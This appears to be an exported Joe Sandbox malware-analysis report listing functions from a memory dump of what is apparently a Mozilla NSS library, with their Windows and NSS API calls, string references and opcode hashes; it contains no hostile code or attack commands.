Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: f468e3eac16f8beb48da97c81beae9c6a9a290eef507413a72a8a35043c85256
Instruction ID: 5ee5e49d2b65e68d37c00f0c9182e3f81c7b0302be4ca7cfcae4452f8a35f465
Opcode Fuzzy Hash: f468e3eac16f8beb48da97c81beae9c6a9a290eef507413a72a8a35043c85256
Instruction Fuzzy Hash: DF112971A00214AFDB158F52DD41AAAB7A6FF89324F014439FC094BB81EB34E956C7D6

Function 6C6F0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C6F0BDE), ref: 6C6F0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C6F0BDE), ref: 6C6F0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C6F0BDE), ref: 6C6F0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C6F0BDE), ref: 6C6F0E32

Strings

%s incr => %d (find lib), xrefs: 6C6F0E2D

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 2d37711696f4cd68a0e1c7e2979916f6e72e4692ec1c8c21af71f509f5a82ce1
Instruction ID: 81bb00edc7817f264eb9a21175458e3463a9a07a2e82cfef28ecfa9243259a20
Opcode Fuzzy Hash: 2d37711696f4cd68a0e1c7e2979916f6e72e4692ec1c8c21af71f509f5a82ce1
Instruction Fuzzy Hash: FE01F1727002149FE6308F298C49E67B3EEDB45B08B04487DE909D3A42E761EC16CBE1

Function 6C7AAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC2D

Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
Part of subcall function 6C74ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
Part of subcall function 6C74ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
Part of subcall function 6C74ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9

PK11_FreeSymKey.NSS3(?,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]yl,00000000,?,?,6C786AC6,?), ref: 6C7AAC59
free.MOZGLUE(8CB6FF01,6C786AC6,?,?,?,?,?,?,?,?,?,?,6C795D40,00000000,?,6C79AAD4), ref: 6C7AAC62

Strings

@]yl, xrefs: 6C7AAC05

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]yl
API String ID: 1595327144-1691211022
Opcode ID: 160e891dab6f24cec4b214c534612e3bc929b7585f2df50a7318ca8fcc5be063
Instruction ID: 5c0ef5fc7182319a61cd9911c43402cb4a8f5671bead164b9ab68f33ecf3ad60
Opcode Fuzzy Hash: 160e891dab6f24cec4b214c534612e3bc929b7585f2df50a7318ca8fcc5be063
Instruction Fuzzy Hash: FD014FB56002009FEB10DF55EAC5B5677A8AF4476CF188078E9498F706D735E845CFA2

Function 6C682940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C681360,00000000), ref: 6C682A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C681360,00000000), ref: 6C682A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C682A7C

Part of subcall function 6C682D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BAEEE052,?,?,00000000,?,6C68296E), ref: 6C682DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C682AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C681360,00000000), ref: 6C682B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C682B90

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 7b4e42f1838a4553a5edbbffebdaa2eeb6fbc78d074f2b5a88b229e46c704a6b
Instruction ID: 3275d3ad085e20585802d3ac06ef56f603978ab411274db82ebb64e00345408c
Opcode Fuzzy Hash: 7b4e42f1838a4553a5edbbffebdaa2eeb6fbc78d074f2b5a88b229e46c704a6b
Instruction Fuzzy Hash: 6CC1D671F022068BEB14CF69C8987ABB7B5BF89318F148229D9159B741D734E841CBE9

Function 6C699C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C699CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C699D45
EnterCriticalSection.KERNEL32(?), ref: 6C699D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C699DDE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: af7f1fd9746e0b2d04a47622d295a6ed90fdec4760f7a7c224e9b720fbf50b1f
Instruction ID: 7cd1e0245c7cc6127651dd72ca58e7ce6ed8f7033ce3e1cc0a4670c99fc2caf8
Opcode Fuzzy Hash: af7f1fd9746e0b2d04a47622d295a6ed90fdec4760f7a7c224e9b720fbf50b1f
Instruction Fuzzy Hash: 1EA1AC31B041018FEB68DF65E99867E3771BB8771DF18113CE40A47A41DB3AA846CBCA

Function 6C69A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f2855b80e0ac5da186d266eb67dd2e657e8c9031de0369cd24cc08b02b8aa0
Instruction ID: 37eb33adb9df367c96d4757498d4105a702d0b2ae58aa687a73fb9896f2e3adc
Opcode Fuzzy Hash: 06f2855b80e0ac5da186d266eb67dd2e657e8c9031de0369cd24cc08b02b8aa0
Instruction Fuzzy Hash: 3891EE31B042028FEB28DF65D9D9B7A77B5BB87309F04103DE54687A42DB38A845CBD6

Function 6C7ADD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7ADD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C7ADE77

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: deec06b65b3a778f0e7bfbc5fa628838e09cc1cc42c6d9835a9339e1be34b9fd
Instruction ID: ebee2bd04381fb5372e047a0b9ad1bf48565f17c5f155adf9c11d210776d2c88
Opcode Fuzzy Hash: deec06b65b3a778f0e7bfbc5fa628838e09cc1cc42c6d9835a9339e1be34b9fd
Instruction Fuzzy Hash: C1715571A04314CFDB20CF99C68468AB7B4BF69718F25827EDD696B702D770A942CF80

Function 6C71C9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C71CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6C71CA35
PR_Unlock.NSS3(00000000), ref: 6C71CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C71CA77
PR_Unlock.NSS3(00000000), ref: 6C71CAFC

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 86a9bd6814eab772f9ecb0c01a1bacee697387e7e3b465401b71c773b934329a
Instruction ID: ac4e2af461bcc282447a95fcc0d06c1b1c8c286278f4b875e5bb727c80370c1d
Opcode Fuzzy Hash: 86a9bd6814eab772f9ecb0c01a1bacee697387e7e3b465401b71c773b934329a
Instruction Fuzzy Hash: A1410275E042069BEB01EFA4CE45AAB7BB4BF45389F180134ED1897B01EB31E911CBD1

Function 6C6FEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6FEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C6FEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C6FEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6FEEEB
free.MOZGLUE(?), ref: 6C6FEEF6

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 3e7702338032358e8aef3144fd496d1a1cee086db06c4d40e29efce3a88302d1
Instruction ID: 34319f1441cd08e6e3f616af5f6aeb1c7ae1ec53cc54ac4f510e94a36c88ed18
Opcode Fuzzy Hash: 3e7702338032358e8aef3144fd496d1a1cee086db06c4d40e29efce3a88302d1
Instruction Fuzzy Hash: B23139B16042019BE7209F2DEC447A63FF6FB46318F140538E8AA87A51D731E817CBD6

Function 6C7768A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C7768B4

Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F

Part of subcall function 6C6F0F00: PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B
Part of subcall function 6C6F0F00: PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

PR_MillisecondsToInterval.NSS3(?), ref: 6C7768E6
PR_MillisecondsToInterval.NSS3(?), ref: 6C776938
PR_MillisecondsToInterval.NSS3(?), ref: 6C776986
PR_ExitMonitor.NSS3(?), ref: 6C7769BA

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID:
API String ID: 1802314673-0
Opcode ID: 20b21db226f92f2042972478e2529d613746e597c3ae1057423a83c23bb45d15
Instruction ID: a0416b5df3a95460dbd5b82f385c9b56a8bba7267e904d57298d6987ef5a5cde
Opcode Fuzzy Hash: 20b21db226f92f2042972478e2529d613746e597c3ae1057423a83c23bb45d15
Instruction Fuzzy Hash: FD319031705A06EFEB655B30DA083E6BA70BB4630EF040239D85951A55D7346968CEE3

Function 6C70AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000,00000000), ref: 6C70ADA7

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000,00000000), ref: 6C70ADB4

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C703FFF,?,?,?,?,6C703FFF,00000000,?,?,?,?,?,6C701A1C,00000000), ref: 6C70ADD5

Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8294B0,?,?,?,?,?,?,?,?,6C703FFF,00000000,?), ref: 6C70ADEC

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C703FFF), ref: 6C70AE3C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 2da06d118904eaf8b3dfcf1f5537b858641f87274ba7bf570cf61b1e75ab437d
Instruction ID: bc7fca46ca59e37a1aee253d5750c7dd94337834abe962eb5ae88f90b1e104c9
Opcode Fuzzy Hash: 2da06d118904eaf8b3dfcf1f5537b858641f87274ba7bf570cf61b1e75ab437d
Instruction Fuzzy Hash: A81133A1F002056BE7109A659E09BBF72EC9F9125CF044238EC19D6B41FB20E998C3E2

Function 6C758800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: f7d79df34fd86ef673dbfe7bd7bd3e2b9ce5294be992d7d540a75b64640d3967
Instruction ID: 92bd6ed0da3a9cb7cb42606cfef5f57862f0a2374edc7290044af100fa6eff9c
Opcode Fuzzy Hash: f7d79df34fd86ef673dbfe7bd7bd3e2b9ce5294be992d7d540a75b64640d3967
Instruction Fuzzy Hash: E3218BB49646068FCB00AF79C58426ABBF4FF06308F514676DC9896601EB30E8A5CBD2

Function 6C7228A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7180DD), ref: 6C7228BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C7180DD), ref: 6C7228D3
PR_Unlock.NSS3(?,?,?,?,?,6C7180DD), ref: 6C7228E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C7180DD), ref: 6C72290E
free.MOZGLUE(?,?,?,?,?,?,6C7180DD), ref: 6C72291A

Part of subcall function 6C719270: DeleteCriticalSection.KERNEL32(?,?,6C725089,?,6C723B70,?,?,?,?,?,6C725089,6C71F39B,00000000), ref: 6C71927F
Part of subcall function 6C719270: free.MOZGLUE(?,?,6C723B70,?,?,?,?,?,6C725089,6C71F39B,00000000), ref: 6C719286
Part of subcall function 6C719270: PL_HashTableDestroy.NSS3(?,6C723B70,?,?,?,?,?,6C725089,6C71F39B,00000000), ref: 6C719292

Part of subcall function 6C718B50: TlsGetValue.KERNEL32(00000000,?,6C720948,00000000), ref: 6C718B6B
Part of subcall function 6C718B50: EnterCriticalSection.KERNEL32(?,?,?,6C720948,00000000), ref: 6C718B80
Part of subcall function 6C718B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C720948,00000000), ref: 6C718B8F
Part of subcall function 6C718B50: PR_Unlock.NSS3(?,?,?,?,6C720948,00000000), ref: 6C718BA1
Part of subcall function 6C718B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C720948,00000000), ref: 6C718BAC
Part of subcall function 6C718B50: free.MOZGLUE(?,?,?,?,?,6C720948,00000000), ref: 6C718BB8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: c44bc191a49ae9eef8830835ee423a6f989ec9f10abe297f838b6ccf9d15cc36
Instruction ID: 3e630374a4dd87a231233d7420ab22c862caa5327efc11d1143d610d25d6eced
Opcode Fuzzy Hash: c44bc191a49ae9eef8830835ee423a6f989ec9f10abe297f838b6ccf9d15cc36
Instruction Fuzzy Hash: BF212AB5A04A069BCB10AF78C18C469BBF0FF05328F054969DCD497B01E738E895CBD2

Function 6C6F09E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6C6F06A2,00000000,?), ref: 6C6F09F8
malloc.MOZGLUE(0000001F), ref: 6C6F0A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6F0A33

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
